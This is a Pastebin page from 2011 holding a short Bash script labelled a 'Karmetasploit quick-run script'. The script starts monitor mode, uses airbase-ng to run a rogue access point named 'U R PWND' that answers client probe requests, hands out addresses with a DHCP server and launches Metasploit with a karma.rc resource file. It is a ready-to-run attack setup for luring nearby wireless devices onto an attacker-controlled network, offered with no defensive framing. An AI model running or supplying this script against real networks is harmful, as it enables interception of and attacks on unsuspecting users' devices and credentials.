Advertisement
infodox

karma.sh

Dec 29th, 2011
197
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.27 KB | None | 0 0
  1. #!/bin/bash
  2. # Karmetasploit quick-run script
  3. echo [+] using interface $1
  4. cat /etc/dhcp3/dhcpd.conf
  5. airmon-ng start $1
  6. airbase-ng -P -C 30 -e "U R PWND" -v mon0
  7. ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
  8. dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
  9. msfconsole -r karma.rc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement